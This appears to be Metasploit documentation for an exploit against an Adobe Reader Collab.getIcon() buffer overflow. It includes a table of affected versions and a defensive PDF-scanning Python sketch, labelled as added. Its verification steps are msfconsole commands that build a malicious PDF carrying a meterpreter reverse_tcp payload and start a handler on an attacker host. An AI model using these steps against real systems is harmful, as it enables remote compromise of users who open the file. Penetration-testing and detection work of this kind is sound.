Path: blob/master/documentation/modules/exploit/windows/fileformat/adobe_geticon.md
Vulnerable Application
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted PDF that contains a malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.
Link to vulnerable software OldVersion
Test results (on Windows XP SP3)
reader 7.0.5 - no trigger
reader 7.0.8 - no trigger
reader 7.0.9 - no trigger
reader 7.1.0 - no trigger
reader 7.1.1 - reported not vulnerable
reader 8.0.0 - works
reader 8.1.2 - works
reader 8.1.3 - reported not vulnerable
reader 9.0.0 - works
reader 9.1.0 - reported not vulnerable
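For triage on the defensive side, the sketch below (an added example, not part of the Metasploit module or its documentation) scans a PDF's raw bytes and FlateDecode streams for a Collab.getIcon( call and checks a Reader version against the fixed releases listed above. The function names and the sample file are constructed for illustration; other stream filters and obfuscated JavaScript are not handled, so an empty result does not clear a file.

```python
import re
import zlib

# First fixed release per branch, taken from the version list on this page.
FIXED = {7: (7, 1, 1), 8: (8, 1, 3), 9: (9, 1, 0)}
# The JavaScript call named in the module description (whitespace tolerated).
GETICON = re.compile(rb"Collab\s*\.\s*getIcon\s*\(")
# Bytes between the "stream" and "endstream" keywords of a PDF object.
STREAM = re.compile(rb"stream\r?\n(.*?)\r?\n?endstream", re.DOTALL)


def in_affected_range(version):
    """True if a Reader/Acrobat version predates its branch's fixed release."""
    parts = (tuple(int(p) for p in version.split(".")) + (0, 0, 0))[:3]
    fixed = FIXED.get(parts[0])  # branches not listed on the page -> False
    return fixed is not None and parts < fixed


def inflate(data):
    """Best-effort FlateDecode; returns b'' when the data is not zlib."""
    try:
        return zlib.decompressobj().decompress(data)
    except zlib.error:
        return b""


def find_geticon(pdf):
    """List where Collab.getIcon( occurs: 'raw' and/or 'stream N'."""
    hits = ["raw"] if GETICON.search(pdf) else []
    for n, match in enumerate(STREAM.finditer(pdf)):
        if GETICON.search(inflate(match.group(1))):
            hits.append(f"stream {n}")
    return hits


def constructed_sample():
    """Constructed, benign PDF fragment with one compressed script stream."""
    body = zlib.compress(b'var icon = Collab.getIcon("constructed-sample");')
    return (b"%PDF-1.4\n1 0 obj\n<< /Filter /FlateDecode /Length "
            + str(len(body)).encode() + b" >>\nstream\n" + body
            + b"\nendstream\nendobj\n%%EOF\n")


if __name__ == "__main__":
    print(find_geticon(constructed_sample()))
    for v in ("8.1.2", "8.1.3", "9.0.0", "9.1.0"):
        print(v, in_affected_range(v))
```

A hit only means the file references the API; legitimate documents can call it too, so treat a match as a reason to inspect the script, not as a verdict.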
Options
FILENAME
The file name
Verification Steps
Install application on the target machine
Start msfconsole
Do: use exploit/windows/fileformat/adobe_geticon
Do: set payload [windows/meterpreter/reverse_tcp]
Do: set LHOST [IP]
Do: exploit
Do: use exploit/multi/handler
Do: set LHOST [IP]
Do: exploit
Do: Open PDF on target machine with vulnerable software